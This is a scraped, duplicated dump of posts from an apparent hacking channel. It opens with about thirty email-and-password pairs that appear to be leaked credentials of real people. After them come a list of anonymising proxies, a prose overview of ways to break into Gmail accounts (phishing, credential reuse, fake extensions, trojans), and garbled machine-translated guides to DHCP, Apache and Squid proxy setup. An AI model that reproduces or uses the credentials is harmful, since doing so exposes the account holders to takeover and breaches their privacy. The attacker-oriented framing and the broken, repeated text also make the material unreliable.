mailbothra@gmail.com:n123456b
robwilliamsffc@yahoo.co.uk:Fulhamfc1
dcichocki27@hotmail.com:Billyboy12
issah@me.com:mouslim1
supremewildmonkey@gmail.com:Gameflow1
great.dispair@gmail.com:Greatdespair4110
jerome_sollberger@hotmail.com:paheseair1991
alinyear2002@hotmail.com:bd050111
travismcneill@ymail.com:Tarheels23
pace987@yahoo.com:Frogger01
julien.rom98@gmail.com:Julien1998
ordenmuslig@outlook.de:Ordeni31
imransyedbbm@gmail.com:syed28091978
seth.ritter2@gmail.com:CVFootball63
kevhan9@yahoo.com:kel9star
caleb.bryce.scott@gmail.com:Kickflip1
farhood_nomad1985@yahoo.com:squasher
theblazian@gmail.com:doreena21
bluerpk@gmail.com:blue0000ff
ddiaz01@yahoo.com:daviddiaz2011
josef.bremberger@googlemail.com:Avalanche123
mdanford21@outlook.com:Saints2010
daymoon83@hotmail.fr:Carvalho83500
ayasofia89@gmail.com:calin2404
hewson72@hotmail.com:02Camaro
salt33447@gmail.com:Challenger2015
lorenlsimpson@gmail.com:Starwars10
ddrabick@yahoo.com:Helloduhh10
benji512512@gmail.com:Brady5126
ajoker1895@hotmail.com:Theamity1895
arazukie@gmail.com:Poopface12
haroonaltaf@hotmail.com:Haytch123
melaniewalk@gmail.com:dagmar0408
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTODAY PROXIES PREMIUM LIST :
t.me/undercodeTesting
๐ฆ IP Address Port Code Country Anonymity Google Https Last Checked
144.76.214.154 1080 DE Germany elite proxy no yes 3 seconds ago
144.76.214.155 1080 DE Germany elite proxy no yes 20 minutes ago
144.76.214.156 1080 DE Germany elite proxy no yes 20 minutes ago
103.220.207.242 32227 BD Bangladesh elite proxy no yes 20 minutes ago
103.221.254.102 49614 BD Bangladesh elite proxy no yes 20 minutes ago
103.57.71.137 33458 IN India elite proxy no yes 11 minutes ago
103.78.80.194 33442 ID Indonesia elite proxy no yes 11 minutes ago
103.81.104.66 46641 BD Bangladesh elite proxy no yes 20 minutes ago
104.248.158.243 44344 SG Singapore elite proxy no yes 11 minutes ago
109.248.62.207 43558 CZ Czech Republic elite proxy no yes 11 minutes
ago
117.102.73.44 8182 ID Indonesia elite proxy no yes 11 minutes ago
118.172.201.105 50782 TH Thailand elite proxy no yes 11 minutes ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTODAY PROXIES PREMIUM LIST :
t.me/undercodeTesting
๐ฆ IP Address Port Code Country Anonymity Google Https Last Checked
144.76.214.154 1080 DE Germany elite proxy no yes 3 seconds ago
144.76.214.155 1080 DE Germany elite proxy no yes 20 minutes ago
144.76.214.156 1080 DE Germany elite proxy no yes 20 minutes ago
103.220.207.242 32227 BD Bangladesh elite proxy no yes 20 minutes ago
103.221.254.102 49614 BD Bangladesh elite proxy no yes 20 minutes ago
103.57.71.137 33458 IN India elite proxy no yes 11 minutes ago
103.78.80.194 33442 ID Indonesia elite proxy no yes 11 minutes ago
103.81.104.66 46641 BD Bangladesh elite proxy no yes 20 minutes ago
104.248.158.243 44344 SG Singapore elite proxy no yes 11 minutes ago
109.248.62.207 43558 CZ Czech Republic elite proxy no yes 11 minutes
ago
117.102.73.44 8182 ID Indonesia elite proxy no yes 11 minutes ago
118.172.201.105 50782 TH Thailand elite proxy no yes 11 minutes ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMOST ACTIVE GMAIL HACKING IN LAST 7 DAYS
instagram.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Phishing
This is a technology widely used by people to secretly crack Gmail passwords. The fishing process does not require any special technical knowledge and skills. Its main working principle is to copy the original login page of Gmail and steal the user's password. If the user has no experience with the computer, he or she will not notice that the page looks suspicious. This is why they may type a password to log in to Gmail that is automatically transmitted to the hacker. This way he / she will receive a valid password to log in to Gmail and read all required emails.
2) Plain Grabbing
It is used to steal the victim's password. The attacker needs to crack the specific website where the target victim is a member and steal his username and password from the website's database. People often use the same secret vocabulary on many websites. Therefore, the attacker is likely to log into the victim's Gmail and read the email secretly.
3) Browser extension Gmail Hacker
With this method, attackers will not steal your password, but they can indirectly access and control your computer. People can install various additional components upon request. The hacker created a fake plug-in and waited for the victims to fix it, giving them easy access to their email. If a person is not an experienced PC user, he or she will not suspect that the plug-in is fake. This is why it is important not to install any programs from sources you do not trust.
4) Trojan horse
Trojan horses can monitor the victims' computers and control their activities in Gmail. They also record all content of the victim type and display all information so that the attacker can read all logs. Trojan horse program is a program that can be easily hidden in any software (such as media files). Victims can obtain Trojan horses by email or download them on the Internet.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMOST ACTIVE GMAIL HACKING IN LAST 7 DAYS
instagram.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Phishing
This is a technology widely used by people to secretly crack Gmail passwords. The fishing process does not require any special technical knowledge and skills. Its main working principle is to copy the original login page of Gmail and steal the user's password. If the user has no experience with the computer, he or she will not notice that the page looks suspicious. This is why they may type a password to log in to Gmail that is automatically transmitted to the hacker. This way he / she will receive a valid password to log in to Gmail and read all required emails.
2) Plain Grabbing
It is used to steal the victim's password. The attacker needs to crack the specific website where the target victim is a member and steal his username and password from the website's database. People often use the same secret vocabulary on many websites. Therefore, the attacker is likely to log into the victim's Gmail and read the email secretly.
3) Browser extension Gmail Hacker
With this method, attackers will not steal your password, but they can indirectly access and control your computer. People can install various additional components upon request. The hacker created a fake plug-in and waited for the victims to fix it, giving them easy access to their email. If a person is not an experienced PC user, he or she will not suspect that the plug-in is fake. This is why it is important not to install any programs from sources you do not trust.
4) Trojan horse
Trojan horses can monitor the victims' computers and control their activities in Gmail. They also record all content of the victim type and display all information so that the attacker can read all logs. Trojan horse program is a program that can be easily hidden in any software (such as media files). Victims can obtain Trojan horses by email or download them on the Internet.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Set up Your DHCP Server as A hacking
> Full by Undercode :
t.me/UndercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Erection DHCP Server
DHCP is the abbreviation of Dynamic Host Configuration Protocol, mainly used to simplify network management in: The problem of "trouble" in workstation / host network configuration settings, commonly known as: "" dynamic allocation of IP "".
2) Compared with the dynamic allocation mechanism, it uses manual and manual methods to set one by one , Is called static setting.
> Static setting is quite inefficient.
๐ฆImagine: If there are hundreds of workstations in a network segment, manually set it manually, it is not strange to be tired, and, in the future, if you want to change The network configuration is also extremely inconvenient!
1) Therefore, in the network management work, DHCP Server is a very important erection service. In the
2) past, most of the school โs DHCP Servers were installed on NT / W2K, but the performance and The stability is not very good,
3) therefore, the following introduces the installation of DHCP Server on RedHat Linux.
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
Required packages:
dhcp-2.0-5.i386.rpm (RedHat 6.2)
dhcp-2.0-12.i186.rpm (RedHat 7.0)
dhcp-2.0-12.i386.rpm (CLE 1.0)
dhcp-2.0p15-4.i386.rpm ( RedHat 7.1)
2) Please choose the dhcp Server package according to your Linux version.
3) Setting up:
๐ฆ On RedHat Linux, setting up a DHCP Server is very simple!
1) Installation:
(a) rpm -ivh dhcp-2.0-5.i386. After rpm
(b), check, what files are installed in the host?
rpm -ql dhcp | more
2) will get the following list:
/etc/rc.d/init.d/dhcpd
/ usr / doc / dhcp- 2.0
/usr/doc/dhcp-2.0/CHANGES
/usr/doc/dhcp-2.0/README
/usr/doc/dhcp-2.0/RELNOTES
/usr/doc/dhcp-2.0/dhcpd.conf.sample
/ usr / man / man5 / dhcp-options.5.gz
/usr/man/man5/dhcpd.conf.5.gz
/usr/man/man5/dhcpd.leases.5.gz
/usr/man/man8/dhcpd.8.gz
/usr/man/man8/dhcrelay.8.gz
/ usr / sbin / dhcpd
/ usr / sbin / dhcrelay
/ var / state / dhcp
, of which two are more important :
3) One is, /etc/rc.d/init.d/dhcpd, which can be used to control the behavior of the dhcp server, such as:
start: /etc/rc.d/init.d/dhcpd start
stop: / etc / rc .d / init.d / dhcpd stop
restart: /etc/rc.d/init.d/dhcpd restart
4) Observe the operation status: /etc/rc.d/init.d/dhcpd status The
other is, / usr / doc /dhcp-2.0/dhcpd.conf.sample
(RedHat 7.0 in /usr/share/doc/dhcp-2.0)
5) As the name implies, this is a configuration file of the dhcp server, wait a minute, we will copy it to / etc , And named dhcpd.conf.
(C) cp /usr/doc/dhcp-2.0/dhcpd.conf.sample /etc/dhcpd.conf
๐ฆ Set up Your DHCP Server as A hacking
> Full by Undercode :
t.me/UndercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Erection DHCP Server
DHCP is the abbreviation of Dynamic Host Configuration Protocol, mainly used to simplify network management in: The problem of "trouble" in workstation / host network configuration settings, commonly known as: "" dynamic allocation of IP "".
2) Compared with the dynamic allocation mechanism, it uses manual and manual methods to set one by one , Is called static setting.
> Static setting is quite inefficient.
๐ฆImagine: If there are hundreds of workstations in a network segment, manually set it manually, it is not strange to be tired, and, in the future, if you want to change The network configuration is also extremely inconvenient!
1) Therefore, in the network management work, DHCP Server is a very important erection service. In the
2) past, most of the school โs DHCP Servers were installed on NT / W2K, but the performance and The stability is not very good,
3) therefore, the following introduces the installation of DHCP Server on RedHat Linux.
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
Required packages:
dhcp-2.0-5.i386.rpm (RedHat 6.2)
dhcp-2.0-12.i186.rpm (RedHat 7.0)
dhcp-2.0-12.i386.rpm (CLE 1.0)
dhcp-2.0p15-4.i386.rpm ( RedHat 7.1)
2) Please choose the dhcp Server package according to your Linux version.
3) Setting up:
๐ฆ On RedHat Linux, setting up a DHCP Server is very simple!
1) Installation:
(a) rpm -ivh dhcp-2.0-5.i386. After rpm
(b), check, what files are installed in the host?
rpm -ql dhcp | more
2) will get the following list:
/etc/rc.d/init.d/dhcpd
/ usr / doc / dhcp- 2.0
/usr/doc/dhcp-2.0/CHANGES
/usr/doc/dhcp-2.0/README
/usr/doc/dhcp-2.0/RELNOTES
/usr/doc/dhcp-2.0/dhcpd.conf.sample
/ usr / man / man5 / dhcp-options.5.gz
/usr/man/man5/dhcpd.conf.5.gz
/usr/man/man5/dhcpd.leases.5.gz
/usr/man/man8/dhcpd.8.gz
/usr/man/man8/dhcrelay.8.gz
/ usr / sbin / dhcpd
/ usr / sbin / dhcrelay
/ var / state / dhcp
, of which two are more important :
3) One is, /etc/rc.d/init.d/dhcpd, which can be used to control the behavior of the dhcp server, such as:
start: /etc/rc.d/init.d/dhcpd start
stop: / etc / rc .d / init.d / dhcpd stop
restart: /etc/rc.d/init.d/dhcpd restart
4) Observe the operation status: /etc/rc.d/init.d/dhcpd status The
other is, / usr / doc /dhcp-2.0/dhcpd.conf.sample
(RedHat 7.0 in /usr/share/doc/dhcp-2.0)
5) As the name implies, this is a configuration file of the dhcp server, wait a minute, we will copy it to / etc , And named dhcpd.conf.
(C) cp /usr/doc/dhcp-2.0/dhcpd.conf.sample /etc/dhcpd.conf
Configuration:
Then, you can start the configuration file for dhcp server / etc / dhcpd.conf to do the setting work. The
following is the original content of the file:
subnet 192.168.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option nis-domain ""domain.org"";
option domain-name ""domain.org"";
option domain-name-servers 192.168.1.1;
option time-offset -5; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# --- Selects point-to-point node (default is hybrid). Don''t change this unless
# -- you understand Netbios very well
# option netbios-node-type 2;
range dynamic-bootp 192.168.0.128 192.168.0.255;
default-lease-time 21600;
max-lease-time 43200;
# we want the nameserver to appear at a fixed address
host ns {
next-server marvin.redhat.com;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 207.175.42.254;
}
}
>part 2 Set up Your DHCP Server as A hacking
1) Junior High School as an example, the school is the first half of 1/2 C) subnet 163.26.167.0 netmask 255.255.255.128 {
# --- default gateway
# router IP
option routers 163.26.197.126;
2) network mask
option subnet -mask 255.255.255.128;
3) Domain
option domain-name "" jmjh.tnc.edu.tw "";
# Specify which DNS servers to dispatch to provide services?
option domain-name-servers 163.26.167.1, 163.26.200.1 , 168.95.1.1;
4) option time-offset -5; # Eastern Standard Time
# Dynamic allocation of IP fence
5) range dynamic-bootp 163.26.167.50 163.26.167.100;
Then, you can start the configuration file for dhcp server / etc / dhcpd.conf to do the setting work. The
following is the original content of the file:
subnet 192.168.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option nis-domain ""domain.org"";
option domain-name ""domain.org"";
option domain-name-servers 192.168.1.1;
option time-offset -5; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# --- Selects point-to-point node (default is hybrid). Don''t change this unless
# -- you understand Netbios very well
# option netbios-node-type 2;
range dynamic-bootp 192.168.0.128 192.168.0.255;
default-lease-time 21600;
max-lease-time 43200;
# we want the nameserver to appear at a fixed address
host ns {
next-server marvin.redhat.com;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 207.175.42.254;
}
}
>part 2 Set up Your DHCP Server as A hacking
1) Junior High School as an example, the school is the first half of 1/2 C) subnet 163.26.167.0 netmask 255.255.255.128 {
# --- default gateway
# router IP
option routers 163.26.197.126;
2) network mask
option subnet -mask 255.255.255.128;
3) Domain
option domain-name "" jmjh.tnc.edu.tw "";
# Specify which DNS servers to dispatch to provide services?
option domain-name-servers 163.26.167.1, 163.26.200.1 , 168.95.1.1;
4) option time-offset -5; # Eastern Standard Time
# Dynamic allocation of IP fence
5) range dynamic-bootp 163.26.167.50 163.26.167.100;
> setup dhcp as hacking lab :
๐ฆ IP lease time
default-lease-time 21600;
max-lease-time 43200;
๐ฆ Set your school โs DNS host to a fixed IP
1) we want the nameserver to appear at a fixed address
host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 163.26.167.1;
}
} In the
3) above settings, please follow The configuration of your school, modify it
by yourself . Note:
(a) host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD; --- > This is the number of the DNS host network card (6 bytes), please use ifconfig to query, as follows:
fixed-address 163.26.167.1;
}
4) ifconfig got:
eth0 Link encap: Ethernet HWaddr 48: 54: E8: 26: CC: C9
inet addr: 163.26.167.1 Bcast: 163.26.167.127 Mask: 255.255.255.128
5) UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 762193 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 555401 errors: 0 dropped : 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 100
Interrupt: 11 Base address: 0x8000
> take HWaddr 48: 54: E8: 26: CC: C9 48: 54: E8: 26: CC: C9 and
fill in the above hardware ethernet settings can be.
special Note:! your school ID card (each card the world's only) and this will not be the same as this, do not copy here of the set value yo
6) this may dhcp server Coexist with the original dhcp server on NT / W2K, but please note that the IP allocation segment should be staggered.
So, in the end, which dhcp server the workstation will get dynamic allocation?
7) Very simple, when the workstation sends a request (request ) Message, whoever grabs it first will provide it first.
๐ฆ Execution:
/etc/rc.d/init.d/dhcpd start
will not succeed the first time,
If it is dhcp-2.0-5 version, it will show a failed red string and warn you:
/var/state/dhcp/dhcpd.leases This file does not exist, so you must manually open a new file:
touch / var
8) The purpose of the /state/dhcp/dhcpd.leases file is to record the status of leased IP of each workstation.
If it is a version after DHCP-2.0-12, no message will appear, and you will find that it does not work.
9) This is Because: Once this version finds that you have not opened this file, it will jump out without running.
10) And the location of this file is slightly different:
it is located in /var/lib/dhcp/dhcpd.leases
OK, open it manually ?!
touch /var/lib/dhcp/dhcpd.leases
11) can now be started, and set it to run automatically upon booting (either linuxconf or ntsysv can be set)
/etc/rc.d/init.d/dhcpd start
Congratulations ! Your school already has a very stable DHCP server!
๐ฆ Note:
If you have a Linux firewall, you want to allocate the DHCP server from a certain network card (one network card represents a network segment),
for example: Zhang network card interface eth1 dispensed, as long as the modifications to /etc/rc.d/init.d/dhcpd.
follows:
the start daemons place
by the:
daemon / usr / sbin / dhcpd
changed to:
daemon / usr / sbin / dhcpd eth1
๐ฆ Conclusion:
DHCP Server is a very important tool in network management work. It is also wise to set up more than two backups.
And, from then on, you It is no longer necessary to rely on NT / W2K, a system with poor performance and instability (the price-to-earnings ratio is too low).
(It is not necessary to be restricted to a closed company, and do not have to spend a lot of money, it is the network of primary and secondary schools. Build, the best PE ratio choice!)
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ IP lease time
default-lease-time 21600;
max-lease-time 43200;
๐ฆ Set your school โs DNS host to a fixed IP
1) we want the nameserver to appear at a fixed address
host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD;
fixed-address 163.26.167.1;
}
} In the
3) above settings, please follow The configuration of your school, modify it
by yourself . Note:
(a) host ns {
next-server dns.jmjh.tnc.edu.tw;
hardware ethernet 12: 34: 56: 78: AB: CD; --- > This is the number of the DNS host network card (6 bytes), please use ifconfig to query, as follows:
fixed-address 163.26.167.1;
}
4) ifconfig got:
eth0 Link encap: Ethernet HWaddr 48: 54: E8: 26: CC: C9
inet addr: 163.26.167.1 Bcast: 163.26.167.127 Mask: 255.255.255.128
5) UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric: 1
RX packets: 762193 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 555401 errors: 0 dropped : 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 100
Interrupt: 11 Base address: 0x8000
> take HWaddr 48: 54: E8: 26: CC: C9 48: 54: E8: 26: CC: C9 and
fill in the above hardware ethernet settings can be.
special Note:! your school ID card (each card the world's only) and this will not be the same as this, do not copy here of the set value yo
6) this may dhcp server Coexist with the original dhcp server on NT / W2K, but please note that the IP allocation segment should be staggered.
So, in the end, which dhcp server the workstation will get dynamic allocation?
7) Very simple, when the workstation sends a request (request ) Message, whoever grabs it first will provide it first.
๐ฆ Execution:
/etc/rc.d/init.d/dhcpd start
will not succeed the first time,
If it is dhcp-2.0-5 version, it will show a failed red string and warn you:
/var/state/dhcp/dhcpd.leases This file does not exist, so you must manually open a new file:
touch / var
8) The purpose of the /state/dhcp/dhcpd.leases file is to record the status of leased IP of each workstation.
If it is a version after DHCP-2.0-12, no message will appear, and you will find that it does not work.
9) This is Because: Once this version finds that you have not opened this file, it will jump out without running.
10) And the location of this file is slightly different:
it is located in /var/lib/dhcp/dhcpd.leases
OK, open it manually ?!
touch /var/lib/dhcp/dhcpd.leases
11) can now be started, and set it to run automatically upon booting (either linuxconf or ntsysv can be set)
/etc/rc.d/init.d/dhcpd start
Congratulations ! Your school already has a very stable DHCP server!
๐ฆ Note:
If you have a Linux firewall, you want to allocate the DHCP server from a certain network card (one network card represents a network segment),
for example: Zhang network card interface eth1 dispensed, as long as the modifications to /etc/rc.d/init.d/dhcpd.
follows:
the start daemons place
by the:
daemon / usr / sbin / dhcpd
changed to:
daemon / usr / sbin / dhcpd eth1
๐ฆ Conclusion:
DHCP Server is a very important tool in network management work. It is also wise to set up more than two backups.
And, from then on, you It is no longer necessary to rely on NT / W2K, a system with poor performance and instability (the price-to-earnings ratio is too low).
(It is not necessary to be restricted to a closed company, and do not have to spend a lot of money, it is the network of primary and secondary schools. Build, the best PE ratio choice!)
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCREATE YOUR OWN HOST FILE :
Interpretation of apache configuration file http.conf by Undercode :
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) interpretation apache configuration file http.conf
recently wanted to do with their own server machines, because I know enough about the contents of http.conf, as well as their own path detours. Now explain the meaning of several options that need to be modified frequently in this file,
2) Bindaddress 127.0.0.1, this option means to bind your own IP address. If you are a stand-alone, this is your IP address; if your machine is online, then Bindaddress is followed by your IP address (I wasted a lot of time because I did not change the IP address here to my own IP address ).
Servername localhost, this option is the domain name of your machine
3) If you are a stand-alone, the domain name is localhost; if you are connected to the Internet, you should connect the domain name behind Servername, if not, then connect your own IP address.
Port 80, this option is to indicate the port the server is listening on, generally defaults to 80, and can be changed to 80 or 8080.
4) ScriptAlias โโ/ php4 / \ "C: / php4 / \"
AddType application / x-httpd-php4 .php
AddType application / x-httpd-php4 .php3
AddType application / x-httpd-php4 .php4
Action application / x-httpd- php4 \ "/ php4 / php.exe \" The
above options allow your Apache to support PHP4.
About the default startup document: Apache's default startup document is index.html DirectoryIndex index.html Change it to the default startup document you want. Want to support more documents like this:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4
> Well, with these options APACHE should basically be able to run normally!
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCREATE YOUR OWN HOST FILE :
Interpretation of apache configuration file http.conf by Undercode :
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) interpretation apache configuration file http.conf
recently wanted to do with their own server machines, because I know enough about the contents of http.conf, as well as their own path detours. Now explain the meaning of several options that need to be modified frequently in this file,
2) Bindaddress 127.0.0.1, this option means to bind your own IP address. If you are a stand-alone, this is your IP address; if your machine is online, then Bindaddress is followed by your IP address (I wasted a lot of time because I did not change the IP address here to my own IP address ).
Servername localhost, this option is the domain name of your machine
3) If you are a stand-alone, the domain name is localhost; if you are connected to the Internet, you should connect the domain name behind Servername, if not, then connect your own IP address.
Port 80, this option is to indicate the port the server is listening on, generally defaults to 80, and can be changed to 80 or 8080.
4) ScriptAlias โโ/ php4 / \ "C: / php4 / \"
AddType application / x-httpd-php4 .php
AddType application / x-httpd-php4 .php3
AddType application / x-httpd-php4 .php4
Action application / x-httpd- php4 \ "/ php4 / php.exe \" The
above options allow your Apache to support PHP4.
About the default startup document: Apache's default startup document is index.html DirectoryIndex index.html Change it to the default startup document you want. Want to support more documents like this:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4
> Well, with these options APACHE should basically be able to run normally!
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Traditional proxy, transparent proxy, plug-gw, Apache reverse proxy, IP disguiseThe first part of the characteristics of various proxy methods and package rewriting process Full by Undercode
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Squid traditional proxy and transparent proxy: The
most widely used traditional proxy and transparent proxy on Linux is Squid. The default Squid is configured as a traditional proxy.
In this way, the windows client has to set the proxy server address and port number in the browser, and the client has
very little work to do . You only need to specify the IP address and port number of the proxy server, and everything else is left to the proxy server
to do. An obvious feature in this way is that when a Windows client browses a webpage and enters a URL, the DNS is also done by the proxy
server.
2) The DNS resolution process is based on the resolution order in the /etc/host.conf file set in the Linux server.
The general order is to find / etc / hosts first, then find the DNS database bind. An interesting example in this case is that if you set the
domain name of a site as a server in your intranet, then go to the intranet server first.
3) If you set
192.168.11.3 www.yahoo.com, it is impossible for your browser to access the yahoo site on the Internet.
But if you set up a transparent proxy, the DNS order of resolution will become
windowshosts and then the DNS database of Linux. It is no longer possible to check the / etc / hosts file on the Linux server.
For the introduction of transparent proxy, see another article in the article collection "How to set up a transparent proxy in Linux"
4) The package rewriting process of traditional proxy and transparent proxy: see the following :
[PC] A [Linux squid server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
๐ฆ Set the proxy to 192.168.11.5 and the port number to 3128 on the browser of the user of machine A, and use B to access the Internet.
If you visit www.linuxforum.net, in fact, as long as you set up a proxy, the user's browser only
6) communicates with the Linux Squid server and never talks to the www.linuxforum.net server on the Internet. The Squid proxy server first
www.linuxforum.net for parsing (find the parsing sequence in /etc/host.conf, first / etc / hosts and then DNS lookup)
to the IP address 202.106.124.185, and finally the proxy server replaces the IP address for the client For HTTP access, the returned
information is first cached in the Squid cache, and a copy is also copied to the client. If the user or another user visits the same page next time,
it can be saved from the Squid cache.
๐ฆ The process of transparent proxy is similar to traditional proxy, the difference is
1) The DNS resolution process is different, as already mentioned
2) The transparent proxy gateway must be set to the IP address of the Squid proxy server, which is not required for traditional proxy.
3) The transparent proxy needs to set the input rules of the fire chain. The
rest is the same as the traditional proxy method of Squid.
plug-gw:
plug-gw is a general agent program included in FWTK. Can be used to proxy application layer services like POP3, HTTP, etc.
[PC] A [Linux POP3] C [Linux plug-gw] B
192.168.11.12_ | ______ | 192.168.11.1 ____ 192.168.11.5 | ___ 1.2.3.4__Internet
๐ฆ If there is a Linux on the internal network segment POP3 server C (192.168.11.1), the user can wish to receive an external message
may be set in the plug-gw POP3 proxy machine B as follows:
1) place the following line to /etc/rc.d/rc.local
/ usr / local / etc / plug-gw -daemon 1.2.3.4:110 -name plug-gw-pop3 &
file / usr / local / etc / netperm-table has the following line
plug-gw-pop3: port 110 * -plug-to 192.168. 11.1 -port 110
๐ฆ Traditional proxy, transparent proxy, plug-gw, Apache reverse proxy, IP disguiseThe first part of the characteristics of various proxy methods and package rewriting process Full by Undercode
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Squid traditional proxy and transparent proxy: The
most widely used traditional proxy and transparent proxy on Linux is Squid. The default Squid is configured as a traditional proxy.
In this way, the windows client has to set the proxy server address and port number in the browser, and the client has
very little work to do . You only need to specify the IP address and port number of the proxy server, and everything else is left to the proxy server
to do. An obvious feature in this way is that when a Windows client browses a webpage and enters a URL, the DNS is also done by the proxy
server.
2) The DNS resolution process is based on the resolution order in the /etc/host.conf file set in the Linux server.
The general order is to find / etc / hosts first, then find the DNS database bind. An interesting example in this case is that if you set the
domain name of a site as a server in your intranet, then go to the intranet server first.
3) If you set
192.168.11.3 www.yahoo.com, it is impossible for your browser to access the yahoo site on the Internet.
But if you set up a transparent proxy, the DNS order of resolution will become
windowshosts and then the DNS database of Linux. It is no longer possible to check the / etc / hosts file on the Linux server.
For the introduction of transparent proxy, see another article in the article collection "How to set up a transparent proxy in Linux"
4) The package rewriting process of traditional proxy and transparent proxy: see the following :
[PC] A [Linux squid server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
๐ฆ Set the proxy to 192.168.11.5 and the port number to 3128 on the browser of the user of machine A, and use B to access the Internet.
If you visit www.linuxforum.net, in fact, as long as you set up a proxy, the user's browser only
6) communicates with the Linux Squid server and never talks to the www.linuxforum.net server on the Internet. The Squid proxy server first
www.linuxforum.net for parsing (find the parsing sequence in /etc/host.conf, first / etc / hosts and then DNS lookup)
to the IP address 202.106.124.185, and finally the proxy server replaces the IP address for the client For HTTP access, the returned
information is first cached in the Squid cache, and a copy is also copied to the client. If the user or another user visits the same page next time,
it can be saved from the Squid cache.
๐ฆ The process of transparent proxy is similar to traditional proxy, the difference is
1) The DNS resolution process is different, as already mentioned
2) The transparent proxy gateway must be set to the IP address of the Squid proxy server, which is not required for traditional proxy.
3) The transparent proxy needs to set the input rules of the fire chain. The
rest is the same as the traditional proxy method of Squid.
plug-gw:
plug-gw is a general agent program included in FWTK. Can be used to proxy application layer services like POP3, HTTP, etc.
[PC] A [Linux POP3] C [Linux plug-gw] B
192.168.11.12_ | ______ | 192.168.11.1 ____ 192.168.11.5 | ___ 1.2.3.4__Internet
๐ฆ If there is a Linux on the internal network segment POP3 server C (192.168.11.1), the user can wish to receive an external message
may be set in the plug-gw POP3 proxy machine B as follows:
1) place the following line to /etc/rc.d/rc.local
/ usr / local / etc / plug-gw -daemon 1.2.3.4:110 -name plug-gw-pop3 &
file / usr / local / etc / netperm-table has the following line
plug-gw-pop3: port 110 * -plug-to 192.168. 11.1 -port 110